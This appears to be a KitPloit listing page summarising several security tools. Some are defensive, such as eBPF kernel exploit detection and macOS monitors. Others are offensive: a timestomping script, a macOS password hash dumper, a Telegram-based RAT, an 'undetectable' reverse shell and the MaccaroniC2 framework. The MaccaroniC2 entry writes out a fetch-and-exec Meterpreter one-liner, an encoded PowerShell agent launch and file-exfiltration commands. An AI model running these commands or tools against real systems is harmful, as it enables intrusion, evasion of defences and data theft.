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☐ β˜† βœ‡ KitPloit - PenTest Tools!

Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

By: Zion3R β€” January 31st 2024 at 11:30

A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

  • Change timestamps for individual files or directories.
  • Recursively apply timestamps to all files in a directory.
  • Option to use specific credentials for remote paths or privileged files.

I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.


  • -Path: The path to the file or directory whose timestamps you wish to modify.
  • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
  • -Credentials: (Optional) If you need to specify a different user's credentials.
  • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

Usage Examples

Specify the -Recurse switch to apply timestamps recursively:

  1. Change the timestamp of an individual file:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
  1. Recursively change timestamps for all files in a directory:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse 
  1. Use specific credentials:
☐ β˜† βœ‡ KitPloit - PenTest Tools!

VED-eBPF - Kernel Exploit And Rootkit Detection Using eBPF

By: Zion3R β€” December 18th 2023 at 11:30

VED (Vault Exploit Defense)-eBPF leverages eBPF (extended Berkeley Packet Filter) to implement runtime kernel security monitoring and exploit detection for Linux systems.


eBPF is an in-kernel virtual machine that allows code execution in the kernel without modifying the kernel source itself. eBPF programs can be attached to tracepoints, kprobes, and other kernel events to efficiently analyze execution and collect data.

VED-eBPF uses eBPF to trace security-sensitive kernel behaviors and detect anomalies that could indicate an exploit or rootkit. It provides two main detections:

  • wCFI (Control Flow Integrity) traces the kernel call stack to detect control flow hijacking attacks. It works by generating a bitmap of valid call sites and validating each return address matches a known callsite.

  • PSD (Privilege Escalation Detection) traces changes to credential structures in the kernel to detect unauthorized privilege escalations.

How it Works

VED-eBPF attaches eBPF programs to kernel functions to trace execution flows and extract security events. The eBPF programs submit these events via perf buffers to userspace for analysis.


wCFI traces the call stack by attaching to functions specified on the command line. On each call, it dumps the stack, assigns a stack ID, and validates the return addresses against a precomputed bitmap of valid call sites generated from objdump and /proc/kallsyms.

If an invalid return address is detected, indicating a corrupted stack, it generates a wcfi_stack_event containing:

* Stack trace
* Stack ID
* Invalid return address

This security event is submitted via perf buffers to userspace.

The wCFI eBPF program also tracks changes to the stack pointer and kernel text region to keep validation up-to-date.


PSD traces credential structure modifications by attaching to functions like commit_creds and prepare_kernel_cred. On each call, it extracts information like:

* Current process credentials
* Hashes of credentials and user namespace
* Call stack

It compares credentials before and after the call to detect unauthorized changes. If an illegal privilege escalation is detected, it generates a psd_event containing the credential fields and submits it via perf buffers.


VED-eBPF requires:

  • Linux kernel v5.17+ (tested on v5.17)
  • eBPF support enabled
  • BCC toolkit

Current Status

VED-eBPF is currently a proof-of-concept demonstrating the potential for eBPF-based kernel exploit and rootkit detection. Ongoing work includes:

  • Expanding attack coverage
  • Performance optimization
  • Additional kernel versions
  • Integration with security analytics


VED-eBPF shows the promise of eBPF for building efficient, low-overhead kernel security monitoring without kernel modification. By leveraging eBPF tracing and perf buffers, critical security events can be extracted in real-time and analyzed to identify emerging kernel threats for cloud native envionrment.

☐ β˜† βœ‡ KitPloit - PenTest Tools!

MacMaster - MAC Address Changer

By: Zion3R β€” December 18th 2023 at 11:30

MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.


  • Custom MAC Address: Set a specific MAC address to your network interface.
  • Random MAC Address: Generate and set a random MAC address.
  • Reset to Original: Reset the MAC address to its original hardware value.
  • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
  • Version Information: Easily check the version of MacMaster you are using.


MacMaster requires Python 3.6 or later.

  1. Clone the repository:
    $ git clone
  2. Navigate to the cloned directory:
    cd MacMaster
  3. Install the package:
    $ python install


$ macmaster --help         
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

MacMaster: Mac Address Changer

-h, --help show this help message and exit
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value


  • --interface, -i: Specify the network interface.
  • --random, -r: Set a random MAC address.
  • --newmac, -nm: Set a specific MAC address.
  • --customoui, -co: Set a custom OUI for the MAC address.
  • --reset, -rs: Reset MAC address to the original value.
  • --version, -V: Show the version of the program.
  1. Set a specific MAC address:
    $ -i eth0 -nm 00:11:22:33:44:55
  2. Set a random MAC address:
    $ -i eth0 -r
  3. Reset MAC address to its original value:
    $ -i eth0 -rs
  4. Set a custom OUI:
    $ -i eth0 -co 08:00:27
  5. Show program version:
    $ -V

Replace eth0 with your desired network interface.


You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.


Contributions are welcome! To contribute to MacMaster, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.


For any inquiries or further information, you can reach me through the following channels:


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Osx-Password-Dumper - A Tool To Dump Users'S .Plist On A Mac OS System And To Convert Them Into A Crackable Hash

By: Zion3R β€” December 13th 2023 at 11:30

 ο”“ OSX Password Dumper Script


A bash script to retrieve user's .plist files on a macOS system and to convert the data inside it to a crackable hash format. (to use with John The Ripper or Hashcat)

Useful for CTFs/Pentesting/Red Teaming on macOS systems.


  • The script must be run as a root user (sudo)
  • macOS environment (tested on a macOS VM Ventura beta 13.0 (22A5266r))


sudo ./ OUTPUT_FILE /path/to/save/.plist

☐ β˜† βœ‡ KitPloit - PenTest Tools!

MaccaroniC2 - A PoC Command And Control Framework That Utilizes The Powerful AsyncSSH

By: Zion3R β€” November 27th 2023 at 11:30

MaccaroniC2 is a proof-of-concept Command and Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration. This tool is inspired for a specific scenario where the victim runs the AsyncSSH server and establishes a tunnel to the outside, ready to receive commands by the attacker.

The attacker leverages the Ngrok official API to retrieve the hostname and port of the tunnel to establish a connection. This approach takes advantage of the comprehensive capabilities provided by AsyncSSH, including its integrated support for SFTP and SCP, facilitating secure and efficient data exfiltration and more.

Moreover, the attacker can send and execute system commands using a SOCKS proxy, leveraging the benefits offered, for example, using TOR to enhance anonymity.

  • Ngrok free account only allows the usage of one tunnel at a time. With some changes this tool could be perfect for a BOT-like C&C framework to control multiple SSH instances, but you would need to upgrade your plan on the Ngrok website, see

Setup and Procedure

  1. Run python3 to generate a pair of SSH keys. The newly generated id_rsa is used by the attacker to connect to the server running on the victim's machine.

  2. Edit the file and place the contents of the newly generated inside the pub_key variable. The provide an implementation of the SSHv2 protocol with SFTP and SCP features. This is the script run by the victim.

  3. Create a free account on Ngrok site and take note of the AUTH Token.

  4. Add the AUTH token to the token variable in, this needs to be harcoded inside the ngrok_tunnel() function.

  5. Create a free API key on the Ngrok website. Take note of the generated string.

  6. Put the API key string in the api_key variable inside the file. This allows us to automatically retrieve the Ngrok domain and port of the active tunnel during automation.

  7. Perform the same step for file. This script retrieves various useful information about active tunnels.

Send commands to server

With you can send any command to the server. It automatically requests the Ngrok tunnel's domain and port activated by the victim using Ngrok official API.

Please note also that the id_rsa needs to be in the same folder of

Basic Usage

Run server on victim machine:


From the attacker machine send command using socks proxy:

python3 "ls -la" --proxy socks5://

Send command without using a proxy:

python3 "whoami"

Spawn another C2 agent (Powershell-Empire, Meterpreter, etc):

python3 "powershell.exe -e ABJe...dhYte"

Meterpreter web_delivery module

python3 "python3 -c \"import sys; import ssl; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=('urlopen',)); r=u.urlopen('', context=ssl._create_unverified_context()); exec(;\""

Get list of active tunnels:


Generate new RSA key pairs:


Advanced Usage

Using SFTP and SCP - you don't need a valid username just the correct id_rsa

  • With proxy:

proxychains sftp -P NGROK_PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -o ProxyCommand="nc -x localhost:9050 %h NGROK_PORT" source_file ddddd@NGROK_HOST:destination_path

  • No proxy:

sftp -P PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -P PORT source_file ddddd@NGROK_HOST:destination_path

Compiling with Nuitka

python -m pip install nuitka

python -m nuitka --standalone --onefile

Weaponized server

For furter information check the related article:

DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage. Please ensure compliance with applicable laws and regulations while utilizing this tool. Additionally, it’s important to note that the usage of Ngrok in conjunction with this tool may result in the violation of the terms of service or policies of certain platforms. It is advisable to review and comply with the terms of use of any platform or service to avoid potential account bans or disruptions.

☐ β˜† βœ‡ KitPloit - PenTest Tools!

Red Canary Mac Monitor - An Advanced, Stand-Alone System Monitoring Tool Tailor-Made For macOS Security Research

By: Zion3R β€” November 9th 2023 at 11:30

Red Canary Mac Monitor is an advanced, stand-alone system monitoring tool tailor-made for macOS security research, malware triage, and system troubleshooting. Harnessing Apple Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to surface only the events that are relevant to you. The telemetry collected includes process, interprocess, and file events in addition to rich metadata, allowing users to contextualize events and tell a story with ease. With an intuitive interface and a rich set of analysis features, Red Canary Mac Monitor was designed for a wide range of skill levels and backgrounds to detect macOS threats that would otherwise go unnoticed. As part of Red Canary’s commitment to the research community, the Mac Monitor distribution package is available to download for free.


  • Processor: We recommend an Apple Silicon machine, but Intel works too!
  • System memory: 4GB+ is recommended
  • macOS version: 13.1+ (Ventura)

How can I install this thing?

Homebrew? brew install --cask red-canary-mac-monitor

  • Go to the releases section and download the latest installer:
  • Open the app: Red Canary Mac
  • You'll be prompted to "Open System Settings" to "Allow" the System Extension.
  • Next, System Settings will automatically open to Full Disk Access -- you'll need to flip the switch to enable this for the Red Canary Security Extension. Full Disk Access is a requirement of Endpoint Security.
  • ️ Click the "Start" button in the app and you'll be prompted to reopen the app. Done!

Install footprint

  • Event monitor app which establishes an XPC connection to the Security Extension: /Applications/Red Canary Mac w/signing identifier of com.redcanary.agent.
  • Security Extension: /Library/SystemExtensions/../com.redcanary.agent.securityextension.systemextension w/signing identifier of com.redcanary.agent.securityextension.systemextension.


Homebrew? brew uninstall red-canary-mac-monitor. When using this option you will likely be prompted to authenticate to remove the System Extension.

  • From the Finder delete the app and authenticate to remove the System Extension. You can't do this from the Dock. It's that easy!
  • You can also just remove the Security Extension if you want in the app's menu bar or by going into the app settings.
  • (1.0.3) Supports removal using the ../Contents/SharedSupport/ script.

How are updates handled?

Homebrew? brew update && brew upgrade red-canary-mac-monitor. When using this option you will likely be prompted to authenticate to remove the System Extension.

  • When a new version is available for you to download we'll make a new release.
  • We'll include updated notes and telemetry summaries (if applicable) for each release.
  • All you, as the end user, will need to do is download the update and run the installer. We'll take care of the rest ο˜‰.

How to use this repository

Here we'll be hosting:

  • The distribution package for easy install. See the Releases section. Each major build corresponds to a code name. The first of these builds is GoldCardinal.
  • Telemetry reports in Telemetry reports/ (i.e. all the artifacts that can be collected by the Security Extension).
  • Iconography (what the symbols and colors mean) in Iconography/
  • Updated mute set summaries in Mute sets/
  • AtomicESClient is a seperate, but very closely related project showing the ropes of Endpoint Security check it out in: AtomicESClient/

Additionally, you can submit feature requests and bug reports here as well. When creating a new Issue you'll be able to use one of the two provided templates. Both of these options are also accessible from the in-app "Help" menu.

How are releases structured?

Each release of Red Canary Mac Monitor has a corresponding build name and version number. The first release has the build name of: GoldCardinal and version number 1.0.1.

What are some standout features?

  • High fidelity ES events modeled and enriched with some events containing further enrichment. For example, a process being File Quarantine-aware, a file being quarantined, code signing certificates, etc.

  • Dynamic runtime ES event subscriptions. You have the ability to on-the-fly modify your event subscriptions -- enabling you to cut down on noise while you're working through traces.

  • Path muting at the API level -- Apple's Endpoint Security team has put a lot of work recently into enabling advanced path muting / inversion capabilities. Here, we cover the majority of the API features: es_mute_path and es_mute_path_events along with the types of ES_MUTE_PATH_TYPE_PREFIX, ES_MUTE_PATH_TYPE_LITERAL, ES_MUTE_PATH_TYPE_TARGET_PREFIX, and ES_MUTE_PATH_TYPE_TARGET_LITERAL. Right now we do not support inversion. I'd love it if the ES team added inversion on a per-event basis instead of per-client.

  • Detailed event facts. Right click on any event in a table row to access event metadata, filtering, muting, and unsubscribe options. Core to the user experience is the ability to drill down into any given event or set of events. To enable this functionality we’ve developed β€œEvent facts” windows which contain metadata / additional enrichment about any given event. Each event has a curated set metadata that is displayed. For example, process execution events will generally contain code signing information, environment variables, correlated events, etc. Below you see examples of file creation and BTM launch item added event facts.

  • Event correlation is an exceptionally important component in any analyst's tool belt. The ability to see which events are "related" to one-another enables you to manipulate the telemetry in a way that makes sense (other than simply dumping to JSON or representing an individual event). We perform event correlation at the process level -- this means that for any given event (which have an initiating and/or target process) we can deeply link events that any given process instigated.

  • Process grouping is another helpful way to represent process telemetry around a given ES_EVENT_TYPE_NOTIFY_EXEC or ES_EVENT_TYPE_NOTIFY_FORK event. By grouping processes in this way you can easily identify the chain of activity.

  • Artifact filtering enabled users to remove (but not destroy) events from view based on: event type, initiating process path, or target process path. This standout feature enables analysts to cut through the noise quickly while still retaining all data.

    • Lossy filtering (i.e. events that are dropped from the trace) is also available in the form of "dropping platform binaries" -- another useful technique to cut through the noise.

  • Telemetry export. Right now we support pretty JSON and JSONL (one JSON object per-line) for the full or partial system trace (keyboard shortcuts too). You can access these options in the menu bar under "Export Telemetry".
  • Process subtree generation. When viewing the event facts window for any given event we’ll attempt to generate a process lineage subtree in the left hand sidebar. This tree is intractable – click on any process and you’ll be taken to its event facts. Similarly, you can right click on any process in the tree to pop out the facts for that event.
  • Dynamic event distribution chart. This is a fun one enabled by the SwiftUI team. The graph shows the distribution of events you're subscribed to, currently in-scope (i.e. not filtered), and have a count of more than nothing. This enables you to very quickly identify noisy events. The chart auto-shows/hides itself, but you can bring it back with the: "Mini-chart" button in the toolbar.

Some other features

  • Another very important feature of any dynamic analysis tool is to not let an event limiter or memory inefficient implementation get in the way of the user experience. To address this (the best we currently can) we’ve implemented an asynchronous parent / child-like Core Data stack which stores our events as β€œentities” in-memory. This enables us to store virtually unlimited events with Mac Monitor. Although, the time of insertions does become more taxing as the event limit gets very large.
  • Since Mac Monitor is based on a Security Extension which is always running in the background (like an EDR sensor) we baked in functionality such that it does not process events when a system trace is not occurring. This means that the Red Canary Security Extension (com.redcanary.agent.securityextension) will not needlessly utilize resources / battery power when a trace is not occurring.
  • Distribution package: The install process is often overlooked. However, if users do not have a good understanding of what’s being installed or if it’s too complex to install the barrier to entry might be just high enough to dissuade people from using it. This is why we ship Mac Monitor as a notarized distribution package.

Can you open source Mac Monitor?

We know how much you would love to learn from the source code and/or build tools or commercial products on top of this. Currently, however, Mac Monitor will be distributed as a free, closed-source tool. Enjoy what's being offered and please continue to provide your great feedback. Additionally, never hesitate to reach out if there's one aspect of the implementation you'd love to learn more about. We're an open book when it comes to geeking out about all things implementation, usage, and research methodology.

☐ β˜† βœ‡ KitPloit - PenTest Tools!

WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R β€” November 6th 2023 at 11:30

A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.

WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.


pip install WebSecProbe

WebSecProbe <URL> <Path>


WebSecProbe admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
url = '' # Replace with your target URL
path = 'admin-login' # Replace with your desired path

probe = WebSecProbe(url, path)

☐ β˜† βœ‡ KitPloit - PenTest Tools!

TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

By: Zion3R β€” July 31st 2023 at 12:30

Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions


1. git clone
2. Now Follow the instructions in HOW TO USE Section.


1. Go to Telegram and search for
2. Create Bot and get the API_TOKEN
3. Now search for and get the chat_id
4. Now Go to and go to line 16 and 17 and place API_TOKEN and chat_id there
5. Now run python For Windows and python3 For Linux
6. Now Go to the bot which u created and send command in message field


HELP MENU: Coded By Machine1337
CMD Commands | Execute cmd commands directly in bot
cd .. | Change the current directory
cd foldername | Change to current folder
download filename | Download File From Target
screenshot | Capture Screenshot
info | Get System Info
location | Get Target Location


1. Execute Shell Commands in bot directly.
2. download file from client.
3. Get Client System Information.
4. Get Client Location Information.
5. Capture Screenshot
6. More features will be added


Coded By: Machine1337

☐ β˜† βœ‡ KitPloit - PenTest Tools!

pyFUD - Multi Clients FUD Reverse Shell

By: Zion3R β€” July 28th 2023 at 12:30

python3 based multi clients reverse shell.


1. Don't Upload Any Payloads To Bcz This tool will not work
with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!


1. git clone
2. python3 (enter your ip,port and start the server)
3. (Edit IP AND PORT To Put Your Own IP,Port)


1. python3
2. Now Compile to exe (make sure change ip and port in it)


1. Very Simple And Fully Undectable Reverse Shell
2. Multi Client Handling
3. Persistent Shell
3. auto-reconnect
5. U can Convert to exe using pyinstaller tool in windows.


Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.

☐ β˜† βœ‡ KitPloit - PenTest Tools!

MacOSThreatTrack - Bash Tool Used For Proactive Detection Of Malicious Activity On macOS Systems

By: (Unknown) β€” March 8th 2023 at 11:30

The tool is being tested in the beta phase, and it only gathers MacOS system information at this time.

The code is poorly organized and requires significant improvements.


Bash tool used for proactive detection of malicious activity on macOS systems.

I was inspired by Venator-Swift and decided to create a bash version of the tool.

OneLiner command

curl | bash

Gathered information

[+] System info
[+] Users list
[+] Environment variables
[+] Process list
[+] Active network connections
[+] SIP status
[+] GateKeeper status
[+] Zsh history
[+] Bash history
[+] Shell startup scripts
[+] PF rules
[+] Periodic scripts
[+] CronJobs list
[+] LaunchDaemons data
[+] Kernel extensions
[+] Installed applications
[+] Installation history
[+] Chrome extensions


  1. Saving output as JSON instead of printing out the result.
